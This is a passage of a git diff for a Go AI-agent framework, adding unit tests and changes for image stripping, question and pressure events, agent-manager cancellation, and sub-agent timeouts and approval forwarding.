+// --- stripImageContent tests ---
+
+func TestStripImageContent(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Content: "hello"},
+		{Role: "toolResult", ToolName: "read", Contents: []provider.ContentBlock{
+			{Type: "text", Text: "[Image file: test.png]"},
+			{Type: "image", Image: &provider.ImageContent{MimeType: "image/png", Data: "base64data"}},
+		}},
+		{Role: "assistant", Contents: []provider.ContentBlock{
+			{Type: "text", Text: "I see the image"},
+		}},
+	}
+
+	result := stripImageContent(messages)
+	if len(result) != 3 {
+		t.Fatalf("expected 3 messages, got %d", len(result))
+	}
+
+	// Second message should have image stripped
+	if len(result[1].Contents) != 1 {
+		t.Errorf("expected 1 content block after stripping, got %d", len(result[1].Contents))
+	}
+	if result[1].Contents[0].Type == "image" {
+		t.Error("image content should have been stripped")
+	}
+}
+
+func TestStripImageContentOnlyImage(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Content: "hello"},
+		{Role: "toolResult", ToolName: "read", Contents: []provider.ContentBlock{
+			{Type: "image", Image: &provider.ImageContent{MimeType: "image/png", Data: "base64data"}},
+		}},
+	}
+
+	result := stripImageContent(messages)
+	// Message with only image and no text should be skipped
+	if len(result) != 1 {
+		t.Fatalf("expected 1 message (image-only skipped), got %d", len(result))
+	}
+}
+
+func TestSupportsImages(t *testing.T) {
+	a := &Agent{config: AgentLoopConfig{}}
+	a.config.Model = &provider.Model{Input: []string{"text"}}
+	if a.supportsImages() {
+		t.Error("expected false for text-only model")
+	}
+
+	a.config.Model = &provider.Model{Input: []string{"text", "image"}}
+	if !a.supportsImages() {
+		t.Error("expected true for text+image model")
+	}
+
+	a.config.Model = nil
+	if a.supportsImages() {
+		t.Error("expected false for nil model")
+	}
+}
+
 func TestFormatToolListWithSnippets(t *testing.T) {
 	// Test with tools and snippets
 	tools := []string{"read", "write", "bash"}
@@ -644,6 +796,142 @@ func TestBaseProvider(t *testing.T) {
 	}
 }
 
+// --- ContextWithAgentID tests ---
+
+func TestContextWithAgentID(t *testing.T) {
+	ctx := context.Background()
+	ctx = ContextWithAgentID(ctx, "test-agent")
+
+	id, ok := AgentIDFromContext(ctx)
+	if !ok {
+		t.Fatal("expected agent ID in context")
+	}
+	if id != "test-agent" {
+		t.Errorf("agent ID = %q, want 'test-agent'", id)
+	}
+
+	// Missing from context
+	_, ok = AgentIDFromContext(context.Background())
+	if ok {
+		t.Error("expected no agent ID in empty context")
+	}
+}
+
+func TestContextWithEventChan(t *testing.T) {
+	ch := make(chan Event, 1)
+	ctx := ContextWithEventChan(context.Background(), ch)
+
+	got, ok := EventChanFromContext(ctx)
+	if !ok {
+		t.Fatal("expected event chan in context")
+	}
+	if got == nil {
+		t.Fatal("expected non-nil event chan")
+	}
+
+	_, ok = EventChanFromContext(context.Background())
+	if ok {
+		t.Error("expected no event chan in empty context")
+	}
+}
+
+func TestContextWithParentRunContext(t *testing.T) {
+	parent := context.Background()
+	ctx := ContextWithParentRunContext(context.Background(), parent)
+
+	got, ok := ParentRunContextFromContext(ctx)
+	if !ok {
+		t.Fatal("expected parent run context")
+	}
+	if got != parent {
+		t.Fatal("unexpected parent run context")
+	}
+
+	_, ok = ParentRunContextFromContext(context.Background())
+	if ok {
+		t.Error("expected no parent run context in empty context")
+	}
+}
+
+// --- Manager status tests ---
+
+func TestAgentManagerMarkRunning(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	m.Create(AgentOptions{ID: "a1"})
+	m.MarkRunning("a1")
+	st, ok := m.Status("a1")
+	if !ok {
+		t.Fatal("expected status")
+	}
+	if st.State != "running" {
+		t.Errorf("state = %q, want running", st.State)
+	}
+}
+
+func TestAgentManagerMarkDone(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	m.Create(AgentOptions{ID: "a1"})
+	m.MarkDone("a1", "completed")
+	st, _ := m.Status("a1")
+	if st.State != "done" {
+		t.Errorf("state = %q, want done", st.State)
+	}
+	if st.Result != "completed" {
+		t.Errorf("result = %q, want completed", st.Result)
+	}
+}
+
+func TestAgentManagerMarkError(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	m.Create(AgentOptions{ID: "a1"})
+	m.MarkError("a1", fmt.Errorf("test error"))
+	st, _ := m.Status("a1")
+	if st.State != "error" {
+		t.Errorf("state = %q, want error", st.State)
+	}
+	if st.Error != "test error" {
+		t.Errorf("error = %q, want 'test error'", st.Error)
+	}
+}
+
+func TestAgentManagerMarkErrorNil(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	m.Create(AgentOptions{ID: "a1"})
+	m.MarkError("a1", nil)
+	st, _ := m.Status("a1")
+	if st.Error != "" {
+		t.Errorf("error = %q, want empty", st.Error)
+	}
+}
+
+func TestAgentManagerRegister(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	// Create an agent through factory to get a valid agentpkg.Agent
+	a, _ := m.Create(AgentOptions{ID: "parent"})
+	m.Destroy("parent")
+	// Re-register
+	m.Register(a)
+	if m.Count() != 1 {
+		t.Errorf("count = %d, want 1", m.Count())
+	}
+}
+
+func TestAgentManagerRegisterNil(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	m.Register(nil) // Should not panic
+	if m.Count() != 0 {
+		t.Errorf("count = %d, want 0", m.Count())
+	}
+}
+
+func TestAgentManagerStatusNotFound(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	_, ok := m.Status("nonexistent")
+	if ok {
+		t.Error("expected not found")
+	}
+}
+
 func contains(s, substr string) bool {
 	return len(s) >= len(substr) && (s == substr || len(s) > 0 && containsSubstring(s, substr))
 }
@@ -656,3 +944,136 @@ func containsSubstring(s, substr string) bool {
 	}
 	return false
 }
+
+// --- ForceCompact tests ---
+
+func TestSetForceCompact_ShouldCompactReturnsTrue(t *testing.T) {
+	mockProvider := provider.NewMockProvider("mock", []*provider.Model{
+		{ID: "model1", Name: "Model 1", ContextWindow: 100000},
+	}, nil)
+
+	sb := sandbox.NewNoneSandbox()
+	registry := tools.NewRegistry(t.TempDir(), sb)
+
+	cfg := Config{
+		Provider: mockProvider,
+		Model:    mockProvider.Models()[0],
+		Mode:     "agent",
+	}
+
+	a := New(cfg, registry)
+
+	// Load some messages so there's something to compact
+	a.LoadHistoryMessages([]provider.Message{
+		provider.NewUserMessage("Hello"),
+		provider.NewAssistantMessage([]provider.ContentBlock{{Type: "text", Text: "Hi there"}}),
+	})
+
+	// Without force, ShouldCompact should be false (context is tiny)
+	if a.ShouldCompact() {
+		t.Fatal("ShouldCompact should be false without force and small context")
+	}
+
+	// Set force flag
+	a.SetForceCompact()
+
+	// Now ShouldCompact should return true (force flag set)
+	if !a.ShouldCompact() {
+		t.Fatal("ShouldCompact should be true after SetForceCompact")
+	}
+
+	// Force flag is consumed — second call should return false
+	if a.ShouldCompact() {
+		t.Fatal("ShouldCompact should be false after force flag was consumed")
+	}
+}
+
+func TestSetForceCompact_NoMessagesDoesNotForce(t *testing.T) {
+	mockProvider := provider.NewMockProvider("mock", []*provider.Model{
+		{ID: "model1", Name: "Model 1", ContextWindow: 100000},
+	}, nil)
+
+	sb := sandbox.NewNoneSandbox()
+	registry := tools.NewRegistry(t.TempDir(), sb)
+
+	cfg := Config{
+		Provider: mockProvider,
+		Model:    mockProvider.Models()[0],
+		Mode:     "agent",
+	}
+
+	a := New(cfg, registry)
+
+	// No messages loaded — force should not trigger (nothing to compact)
+	a.SetForceCompact()
+	if a.ShouldCompact() {
+		t.Fatal("ShouldCompact should be false with force but no messages")
+	}
+}
+
+func TestSetForceCompact_NoModelDoesNotForce(t *testing.T) {
+	mockProvider := provider.NewMockProvider("mock", []*provider.Model{
+		{ID: "model1", Name: "Model 1"},
+	}, nil)
+
+	sb := sandbox.NewNoneSandbox()
+	registry := tools.NewRegistry(t.TempDir(), sb)
+
+	cfg := Config{
+		Provider: mockProvider,
+		Model:    nil, // no model
+		Mode:     "agent",
+	}
+
+	a := New(cfg, registry)
+	a.LoadHistoryMessages([]provider.Message{
+		provider.NewUserMessage("Hello"),
+		provider.NewAssistantMessage([]provider.ContentBlock{{Type: "text", Text: "Hi"}}),
+	})
+
+	a.SetForceCompact()
+	if a.ShouldCompact() {
+		t.Fatal("ShouldCompact should be false with force but no model")
+	}
+}
+
+// --- MaxConsecutiveNoText tests ---
+
+func TestMaxConsecutiveNoText_Default(t *testing.T) {
+	mockProvider := provider.NewMockProvider("mock", []*provider.Model{{ID: "m1", Name: "M1"}}, nil)
+	sb := sandbox.NewNoneSandbox()
+	registry := tools.NewRegistry(t.TempDir(), sb)
+
+	a := NewWithLoopConfig(AgentLoopConfig{
+		Config: Config{
+			Provider: mockProvider,
+			Model:    mockProvider.Models()[0],
+			Mode:     "agent",
+		},
+	}, registry)
+
+	// Default MaxConsecutiveNoText should be 200 (MaxIterations default)
+	// but the threshold is 95. Verify the config field is 0 (uses default).
+	if a.config.MaxConsecutiveNoText != 0 {
+		t.Fatalf("expected default MaxConsecutiveNoText=0, got %d", a.config.MaxConsecutiveNoText)
+	}
+}
+
+func TestMaxConsecutiveNoText_Custom(t *testing.T) {
+	mockProvider := provider.NewMockProvider("mock", []*provider.Model{{ID: "m1", Name: "M1"}}, nil)
+	sb := sandbox.NewNoneSandbox()
+	registry := tools.NewRegistry(t.TempDir(), sb)
+
+	a := NewWithLoopConfig(AgentLoopConfig{
+		Config: Config{
+			Provider: mockProvider,
+			Model:    mockProvider.Models()[0],
+			Mode:     "agent",
+		},
+		MaxConsecutiveNoText: 10,
+	}, registry)
+
+	if a.config.MaxConsecutiveNoText != 10 {
+		t.Fatalf("expected MaxConsecutiveNoText=10, got %d", a.config.MaxConsecutiveNoText)
+	}
+}
diff --git a/internal/agent/bridge.go b/internal/agent/bridge.go
index 993fd94..48023c0 100644
--- a/internal/agent/bridge.go
+++ b/internal/agent/bridge.go
@@ -13,12 +13,12 @@ import (
 // MessageToPublic converts an internal provider.Message to a public agent.Message.
 func MessageToPublic(m provider.Message) agentpkg.Message {
 	msg := agentpkg.Message{
-		Role:            agentpkg.Role(m.Role),
-		Content:         m.Content,
-		IsError:         m.IsError,
+		Role:           agentpkg.Role(m.Role),
+		Content:        m.Content,
+		IsError:        m.IsError,
 		SystemInjected: m.SystemInjected,
-		ToolCallID:      m.ToolCallID,
-		ToolName:        m.ToolName,
+		ToolCallID:     m.ToolCallID,
+		ToolName:       m.ToolName,
 	}
 	if m.Usage != nil {
 		msg.Usage = &agentpkg.Usage{
@@ -38,12 +38,12 @@ func MessageToPublic(m provider.Message) agentpkg.Message {
 // MessageFromPublic converts a public agent.Message to an internal provider.Message.
 func MessageFromPublic(m agentpkg.Message) provider.Message {
 	msg := provider.Message{
-		Role:            string(m.Role),
-		Content:         m.Content,
-		IsError:         m.IsError,
+		Role:           string(m.Role),
+		Content:        m.Content,
+		IsError:        m.IsError,
 		SystemInjected: m.SystemInjected,
-		ToolCallID:      m.ToolCallID,
-		ToolName:        m.ToolName,
+		ToolCallID:     m.ToolCallID,
+		ToolName:       m.ToolName,
 	}
 	if m.Usage != nil {
 		msg.Usage = &provider.Usage{
@@ -147,22 +147,27 @@ func ContextUsageToPublic(u *ctxpkg.ContextUsage) *agentpkg.ContextUsage {
 // EventToPublic converts an internal Event to a public agent.Event.
 func EventToPublic(e Event) agentpkg.Event {
 	return agentpkg.Event{
-		AgentID:        agentpkg.AgentID(e.AgentID),
-		Type:           agentpkg.EventType(e.Type),
-		TextDelta:      e.TextDelta,
-		ThinkDelta:     e.ThinkDelta,
-		ToolCallID:     e.ToolCallID,
-		ToolName:       e.ToolName,
-		ToolArgs:       e.ToolArgs,
-		ToolResult:     e.ToolResult,
-		StatusMessage:  e.StatusMessage,
-		Done:           e.Done,
-		StopReason:     e.StopReason,
-		Error:          e.Error,
-		ApprovalID:     e.ApprovalID,
-		ApprovalTool:   e.ApprovalTool,
-		ApprovalArgs:   e.ApprovalArgs,
-		ApprovalResult: e.ApprovalResult,
+		AgentID:         agentpkg.AgentID(e.AgentID),
+		Type:            agentpkg.EventType(e.Type),
+		TextDelta:       e.TextDelta,
+		ThinkDelta:      e.ThinkDelta,
+		ToolCallID:      e.ToolCallID,
+		ToolName:        e.ToolName,
+		ToolArgs:        e.ToolArgs,
+		ToolResult:      e.ToolResult,
+		StatusMessage:   e.StatusMessage,
+		Done:            e.Done,
+		StopReason:      e.StopReason,
+		Error:           e.Error,
+		ApprovalID:      e.ApprovalID,
+		ApprovalTool:    e.ApprovalTool,
+		ApprovalArgs:    e.ApprovalArgs,
+		ApprovalResult:  e.ApprovalResult,
+		QuestionID:      e.QuestionID,
+		QuestionText:    e.QuestionText,
+		QuestionOptions: e.QuestionOptions,
+		QuestionContext: e.QuestionContext,
+		QuestionAnswer:  e.QuestionAnswer,
 	}
 }
 
@@ -254,9 +259,13 @@ func ChatParamsToPublic(p provider.ChatParams) agentpkg.ChatParams {
 	tools := make([]agentpkg.ToolDefinition, len(p.Tools))
 	for i, t := range p.Tools {
 		tools[i] = agentpkg.ToolDefinition{
-			Name:        t.Name,
-			Description: t.Description,
-			Parameters:  t.Parameters,
+			Name:         t.Name,
+			Description:  t.Description,
+			Parameters:   t.Parameters,
+			Kind:         t.Kind,
+			Provider:     t.Provider,
+			ProviderType: t.ProviderType,
+			Model:        t.Model,
 		}
 	}
 	var abort chan struct{}
@@ -319,16 +328,34 @@ func NewAgentAdapter(a *Agent) *AgentAdapter {
 	return &AgentAdapter{inner: a}
 }
 
-func (a *AgentAdapter) ID() agentpkg.AgentID                                    { return a.inner.id }
-func (a *AgentAdapter) ParentID() agentpkg.AgentID                              { return a.inner.parentID }
-func (a *AgentAdapter) Abort()                                                  { a.inner.Abort() }
-func (a *AgentAdapter) HandleApprovalResponse(id string, approved bool)         { a.inner.HandleApprovalResponse(id, approved) }
-func (a *AgentAdapter) Run(ctx context.Context, userMsg string) <-chan agentpkg.Event { return WrapEventChan(a.inner.Run(ctx, userMsg)) }
-func (a *AgentAdapter) RunWithMessages(ctx context.Context, msgs []agentpkg.Message) <-chan agentpkg.Event { return WrapEventChan(a.inner.RunWithMessages(ctx, MessagesFromPublic(msgs))) }
-func (a *AgentAdapter) GetMessages() []agentpkg.Message                         { return MessagesToPublic(a.inner.GetMessages()) }
-func (a *AgentAdapter) SetMessages(msgs []agentpkg.Message)                     { a.inner.SetMessages(MessagesFromPublic(msgs)) }
-func (a *AgentAdapter) GetContextUsage() *agentpkg.ContextUsage                 { return ContextUsageToPublic(a.inner.GetContextUsage()) }
-func (a *AgentAdapter) LoadHistoryMessages(msgs []agentpkg.Message)             { a.inner.LoadHistoryMessages(MessagesFromPublic(msgs)) }
+func (a *AgentAdapter) ID() agentpkg.AgentID       { return a.inner.id }
+func (a *AgentAdapter) ParentID() agentpkg.AgentID { return a.inner.parentID }
+func (a *AgentAdapter) Abort()                     { a.inner.Abort() }
+func (a *AgentAdapter) HandleApprovalResponse(id string, approved bool) {
+	a.inner.HandleApprovalResponse(id, approved)
+}
+
+func (a *AgentAdapter) HandleQuestionResponse(questionID string, answer string) {
+	a.inner.HandleQuestionResponse(questionID, answer)
+}
+func (a *AgentAdapter) Run(ctx context.Context, userMsg string) <-chan agentpkg.Event {
+	return WrapEventChan(a.inner.Run(ctx, userMsg))
+}
+func (a *AgentAdapter) RunWithMessages(ctx context.Context, msgs []agentpkg.Message) <-chan agentpkg.Event {
+	return WrapEventChan(a.inner.RunWithMessages(ctx, MessagesFromPublic(msgs)))
+}
+func (a *AgentAdapter) GetMessages() []agentpkg.Message {
+	return MessagesToPublic(a.inner.GetMessages())
+}
+func (a *AgentAdapter) SetMessages(msgs []agentpkg.Message) {
+	a.inner.SetMessages(MessagesFromPublic(msgs))
+}
+func (a *AgentAdapter) GetContextUsage() *agentpkg.ContextUsage {
+	return ContextUsageToPublic(a.inner.GetContextUsage())
+}
+func (a *AgentAdapter) LoadHistoryMessages(msgs []agentpkg.Message) {
+	a.inner.LoadHistoryMessages(MessagesFromPublic(msgs))
+}
 
 func (a *AgentAdapter) GetContext() *agentpkg.AgentContext {
 	x := a.inner.GetContext()
diff --git a/internal/agent/events.go b/internal/agent/events.go
index 6ffa2cc..c72b11d 100644
--- a/internal/agent/events.go
+++ b/internal/agent/events.go
@@ -36,6 +36,8 @@ const (
 	EventToolResult
 	EventToolApprovalRequest  // Request user approval for tool execution
 	EventToolApprovalResponse // User response to approval request
+	EventQuestionRequest      // Ask user a multiple-choice question
+	EventQuestionResponse     // User response to question
 	EventPlanUpdate           // Structured task plan update
 
 	// Status events
@@ -47,6 +49,10 @@ const (
 	// Compaction events
 	EventCompactionStart
 	EventCompactionEnd
+
+	// Pressure events
+	EventContextPressure // Context usage exceeded threshold (one-shot)
+	EventBudgetPressure  // Remaining iterations below threshold (one-shot)
 )
 
 // Event represents an event from the agent to the UI.
@@ -87,6 +93,13 @@ type Event struct {
 	ApprovalArgs   map[string]any // Tool arguments
 	ApprovalResult bool           // true = approved, false = denied
 
+	// Question events
+	QuestionID      string   // Unique ID for question request
+	QuestionText    string   // The question to display
+	QuestionOptions []string // Predefined options (last one is always "Custom input")
+	QuestionContext string   // Optional context/explanation
+	QuestionAnswer  string   // User's answer (set in response)
+
 	// Status
 	StatusMessage string
 
@@ -100,4 +113,9 @@ type Event struct {
 
 	// Context usage
 	ContextUsage *ctxpkg.ContextUsage
+
+	// Pressure info (for EventContextPressure / EventBudgetPressure)
+	PressureMessage string // Human-readable warning message
+	PressureType    string // "context" or "budget"
+	PressurePercent float64 // Usage percentage that triggered the event
 }
diff --git a/internal/agent/manager.go b/internal/agent/manager.go
index 6355b34..93aea27 100644
--- a/internal/agent/manager.go
+++ b/internal/agent/manager.go
@@ -1,6 +1,7 @@
 package agent
 
 import (
+	"context"
 	"fmt"
 	"sync"
 	"sync/atomic"
@@ -27,6 +28,7 @@ type AgentManager struct {
 	parentOf map[agentpkg.AgentID]agentpkg.AgentID
 	children map[agentpkg.AgentID][]agentpkg.AgentID
 	statuses map[agentpkg.AgentID]ManagedAgentStatus
+	cancels  map[agentpkg.AgentID]context.CancelFunc
 	factory  *AgentFactory
 	counter  int64
 }
@@ -38,6 +40,7 @@ func NewAgentManager(factory *AgentFactory) *AgentManager {
 		parentOf: make(map[agentpkg.AgentID]agentpkg.AgentID),
 		children: make(map[agentpkg.AgentID][]agentpkg.AgentID),
 		statuses: make(map[agentpkg.AgentID]ManagedAgentStatus),
+		cancels:  make(map[agentpkg.AgentID]context.CancelFunc),
 		factory:  factory,
 	}
 }
@@ -114,6 +117,17 @@ func (m *AgentManager) Create(opts AgentOptions) (agentpkg.Agent, error) {
 	return a, nil
 }
 
+// SetCancel records the active run cancel function for an agent.
+func (m *AgentManager) SetCancel(id agentpkg.AgentID, cancel context.CancelFunc) {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+	if cancel == nil {
+		delete(m.cancels, id)
+		return
+	}
+	m.cancels[id] = cancel
+}
+
 // Get returns an agent by ID.
 func (m *AgentManager) Get(id agentpkg.AgentID) (agentpkg.Agent, bool) {
 	m.mu.RLock()
@@ -139,6 +153,10 @@ func (m *AgentManager) Destroy(id agentpkg.AgentID) error {
 	}
 
 	// Abort the agent
+	if cancel, ok := m.cancels[id]; ok {
+		cancel()
+		delete(m.cancels, id)
+	}
 	a.Abort()
 
 	// Remove from parent's children list
@@ -158,10 +176,36 @@ func (m *AgentManager) Destroy(id agentpkg.AgentID) error {
 	delete(m.parentOf, id)
 	delete(m.children, id)
 	delete(m.statuses, id)
+	delete(m.cancels, id)
 
 	return nil
 }
 
+// Finish unregisters a completed top-level agent and cancels any remaining children.
+// Child statuses are retained so callers can inspect why a delegated task stopped.
+func (m *AgentManager) Finish(id agentpkg.AgentID, cause error) {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+
+	for _, childID := range m.children[id] {
+		m.finishChildLocked(childID, cause)
+	}
+	if cancel, ok := m.cancels[id]; ok {
+		cancel()
+		delete(m.cancels, id)
+	}
+	if a, ok := m.agents[id]; ok {
+		a.Abort()
+	}
+	if parentID, hasParent := m.parentOf[id]; hasParent {
+		m.children[parentID] = removeAgentID(m.children[parentID], id)
+	}
+	delete(m.agents, id)
+	delete(m.parentOf, id)
+	delete(m.children, id)
+	delete(m.statuses, id)
+}
+
 // destroyLocked destroys an agent without locking (caller must hold lock).
 func (m *AgentManager) destroyLocked(id agentpkg.AgentID) {
 	// Destroy children recursively
@@ -169,12 +213,52 @@ func (m *AgentManager) destroyLocked(id agentpkg.AgentID) {
 		m.destroyLocked(childID)
 	}
 	if a, ok := m.agents[id]; ok {
+		if cancel, ok := m.cancels[id]; ok {
+			cancel()
+			delete(m.cancels, id)
+		}
 		a.Abort()
 	}
 	delete(m.agents, id)
 	delete(m.parentOf, id)
 	delete(m.children, id)
 	delete(m.statuses, id)
+	delete(m.cancels, id)
+}
+
+func (m *AgentManager) finishChildLocked(id agentpkg.AgentID, cause error) {
+	for _, childID := range m.children[id] {
+		m.finishChildLocked(childID, cause)
+	}
+	if cancel, ok := m.cancels[id]; ok {
+		cancel()
+		delete(m.cancels, id)
+	}
+	if a, ok := m.agents[id]; ok {
+		a.Abort()
+	}
+	st := m.statuses[id]
+	st.ID = id
+	if st.StartedAt.IsZero() {
+		st.StartedAt = time.Now()
+	}
+	if parentID, ok := m.parentOf[id]; ok {
+		st.ParentID = parentID
+	}
+	if st.State != "done" {
+		st.State = "error"
+		if cause != nil {
+			st.Error = cause.Error()
+		} else if st.Error == "" {
+			st.Error = "parent agent finished"
+		}
+	}
+	st.UpdatedAt = time.Now()
+	m.statuses[id] = st
+
+	delete(m.agents, id)
+	delete(m.parentOf, id)
+	delete(m.children, id)
 }
 
 // MarkRunning records that an agent has started processing a task.
@@ -246,6 +330,19 @@ func appendUniqueAgentID(ids []agentpkg.AgentID, id agentpkg.AgentID) []agentpkg
 	return append(ids, id)
 }
 
+func removeAgentID(ids []agentpkg.AgentID, id agentpkg.AgentID) []agentpkg.AgentID {
+	if len(ids) == 0 {
+		return nil
+	}
+	filtered := make([]agentpkg.AgentID, 0, len(ids))
+	for _, existing := range ids {
+		if existing != id {
+			filtered = append(filtered, existing)
+		}
+	}
+	return filtered
+}
+
 // Children returns the children of an agent.
 func (m *AgentManager) Children(id agentpkg.AgentID) []agentpkg.AgentID {
 	m.mu.RLock()
diff --git a/internal/agent/manager_test.go b/internal/agent/manager_test.go
index 8171016..693e0c3 100644
--- a/internal/agent/manager_test.go
+++ b/internal/agent/manager_test.go
@@ -148,6 +148,39 @@ func TestAgentManagerDestroyChild(t *testing.T) {
 	}
 }
 
+func TestAgentManagerFinishCancelsChildrenAndRetainsStatus(t *testing.T) {
+	m := newTestManager()
+	m.Create(AgentOptions{ID: "main"})
+	m.Create(AgentOptions{ID: "sub-1", ParentID: "main"})
+	m.MarkRunning("sub-1")
+
+	cancelled := false
+	m.SetCancel("sub-1", func() {
+		cancelled = true
+	})
+	m.Finish("main", errors.New("network error"))
+
+	if !cancelled {
+		t.Fatal("expected child cancel func to be called")
+	}
+	if m.Count() != 0 {
+		t.Fatalf("expected no active agents, got %d", m.Count())
+	}
+	if _, ok := m.Status("main"); ok {
+		t.Fatal("expected finished parent status to be removed")
+	}
+	st, ok := m.Status("sub-1")
+	if !ok {
+		t.Fatal("expected child status to be retained")
+	}
+	if st.State != "error" {
+		t.Fatalf("expected child state error, got %q", st.State)
+	}
+	if st.Error != "network error" {
+		t.Fatalf("expected child error to preserve cause, got %q", st.Error)
+	}
+}
+
 func TestAgentManagerDestroyNotFound(t *testing.T) {
 	m := newTestManager()
 	err := m.Destroy("nonexistent")
@@ -331,18 +364,18 @@ func TestAgentAdapterImplementsInterface(t *testing.T) {
 
 func TestEventToPublic(t *testing.T) {
 	e := Event{
-		AgentID:       "test-agent",
-		Type:          EventTextDelta,
-		TextDelta:     "hello",
-		ToolCallID:    "tc1",
-		ToolName:      "bash",
-		ToolArgs:      map[string]any{"cmd": "ls"},
-		StatusMessage: "running",
-		Done:          true,
-		StopReason:    "end_turn",
-		Error:         context.Canceled,
-		ApprovalID:    "ap1",
-		ApprovalTool:  "write",
+		AgentID:        "test-agent",
+		Type:           EventTextDelta,
+		TextDelta:      "hello",
+		ToolCallID:     "tc1",
+		ToolName:       "bash",
+		ToolArgs:       map[string]any{"cmd": "ls"},
+		StatusMessage:  "running",
+		Done:           true,
+		StopReason:     "end_turn",
+		Error:          context.Canceled,
+		ApprovalID:     "ap1",
+		ApprovalTool:   "write",
 		ApprovalResult: true,
 	}
 
diff --git a/internal/agent/subagent.go b/internal/agent/subagent.go
index d3627a9..6ea7593 100644
--- a/internal/agent/subagent.go
+++ b/internal/agent/subagent.go
@@ -4,6 +4,7 @@ import (
 	"context"
 	"encoding/json"
 	"fmt"
+	"log"
 	"strings"
 	"sync"
 	"time"
@@ -22,9 +23,13 @@ func NewSubAgentSpawnTool(m *AgentManager) *SubAgentSpawnTool {
 	return &SubAgentSpawnTool{manager: m}
 }
 
-func (t *SubAgentSpawnTool) Name() string         { return "subagent_spawn" }
-func (t *SubAgentSpawnTool) Description() string   { return "Create and start a bounded sub-agent task. Returns a handle for status/result polling." }
-func (t *SubAgentSpawnTool) PromptSnippet() string { return "Create a bounded sub-agent task for independent work" }
+func (t *SubAgentSpawnTool) Name() string { return "subagent_spawn" }
+func (t *SubAgentSpawnTool) Description() string {
+	return "Create and start a bounded sub-agent task. Returns a handle for status/result polling."
+}
+func (t *SubAgentSpawnTool) PromptSnippet() string {
+	return "Create a bounded sub-agent task for independent work"
+}
 func (t *SubAgentSpawnTool) PromptGuidelines() []string {
 	return []string{
 		"Use subagent_spawn only for independent subtasks with clear scope, expected output, and stop conditions",
@@ -84,10 +89,18 @@ func (t *SubAgentSpawnTool) Execute(ctx context.Context, params map[string]any)
 	// Extract parent's event channel from context (injected by executeTool)
 	parentEventCh, _ := EventChanFromContext(ctx)
 
+	// Apply per-agent timeout from default policy, tied to the parent run context.
+	policy := DefaultSubAgentPolicy()
+	parentRunCtx, ok := ParentRunContextFromContext(ctx)
+	if !ok || parentRunCtx == nil {
+		parentRunCtx = context.Background()
+	}
+	runCtx, cancel := context.WithTimeout(parentRunCtx, policy.TimeoutPerAgent)
+
 	// Create approval forwarder that bridges sub-agent approval to parent
 	var approvalHandler func(toolCallID, toolName string, args map[string]any) bool
 	if parentEventCh != nil {
-		approvalHandler = newApprovalForwarder(parentID, parentEventCh)
+		approvalHandler = newApprovalForwarder(runCtx, parentID, parentEventCh)
 	}
 
 	a, err := t.manager.Create(AgentOptions{
@@ -100,28 +113,29 @@ func (t *SubAgentSpawnTool) Execute(ctx context.Context, params map[string]any)
 		ApprovalHandler:   approvalHandler,
 	})
 	if err != nil {
+		cancel()
 		return tools.ToolResult{}, fmt.Errorf("create sub-agent: %w", err)
 	}
 	t.manager.MarkRunning(a.ID())
-
-	// Apply per-agent timeout from default policy
-	policy := DefaultSubAgentPolicy()
-	runCtx, cancel := context.WithTimeout(context.Background(), policy.TimeoutPerAgent)
+	t.manager.SetCancel(a.ID(), cancel)
 
 	// Start the sub-agent asynchronously, forward events to parent
 	go func() {
-		defer cancel()
+		defer func() {
+			cancel()
+			t.manager.SetCancel(a.ID(), nil)
+		}()
 		ch := a.Run(runCtx, buildSubAgentTask(task))
 		for e := range ch {
 			// Forward approval events to parent so the UI can handle them
 			if e.Type == agentpkg.EventToolApprovalRequest && parentEventCh != nil {
-				parentEventCh <- Event{
+				_ = sendParentEvent(runCtx, parentEventCh, Event{
 					Type:         EventToolApprovalRequest,
 					AgentID:      a.ID(),
 					ApprovalID:   e.ApprovalID,
 					ApprovalTool: e.ApprovalTool,
 					ApprovalArgs: e.ApprovalArgs,
-				}
+				})
 			}
 			switch e.Type {
 			case agentpkg.EventDone:
@@ -131,7 +145,9 @@ func (t *SubAgentSpawnTool) Execute(ctx context.Context, params map[string]any)
 			}
 		}
 		if runCtx.Err() != nil {
-			t.manager.MarkError(a.ID(), runCtx.Err())
+			if st, ok := t.manager.Status(a.ID()); !ok || st.State != "done" {
+				t.manager.MarkError(a.ID(), runCtx.Err())
+			}
 		}
 	}()
 
@@ -146,7 +162,7 @@ func (t *SubAgentSpawnTool) Execute(ctx context.Context, params map[string]any)
 
 // newApprovalForwarder creates an ApprovalHandler that forwards sub-agent approval
 // requests to the parent agent's event channel and waits for a response.
-func newApprovalForwarder(parentID agentpkg.AgentID, parentEventCh chan<- Event) func(toolCallID, toolName string, args map[string]any) bool {
+func newApprovalForwarder(ctx context.Context, parentID agentpkg.AgentID, parentEventCh chan<- Event) func(toolCallID, toolName string, args map[string]any) bool {
 	var mu sync.Mutex
 	counter := int64(0)
 	pending := make(map[string]chan bool)
@@ -159,17 +175,27 @@ func newApprovalForwarder(parentID agentpkg.AgentID, parentEventCh chan<- Event)
 		pending[approvalID] = responseCh
 		mu.Unlock()
 
-		// Forward approval request to parent's event channel
-		parentEventCh <- Event{
+		// Forward approval request to parent's event channel.
+		if !sendParentEvent(ctx, parentEventCh, Event{
 			Type:         EventToolApprovalRequest,
 			AgentID:      parentID,
 			ApprovalID:   approvalID,
 			ApprovalTool: toolName,
 			ApprovalArgs: args,
+		}) {
+			mu.Lock()
+			delete(pending, approvalID)
+			mu.Unlock()
+			return false
 		}
 
 		// Wait for response (the parent TUI should call HandleSubAgentApprovalResponse)
-		approved := <-responseCh
+		var approved bool
+		select {
+		case approved = <-responseCh:
+		case <-ctx.Done():
+			approved = false
+		}
 
 		mu.Lock()
 		delete(pending, approvalID)
@@ -179,6 +205,21 @@ func newApprovalForwarder(parentID agentpkg.AgentID, parentEventCh chan<- Event)
 	}
 }
 
+func sendParentEvent(ctx context.Context, ch chan<- Event, ev Event) (ok bool) {
+	defer func() {
+		if r := recover(); r != nil {
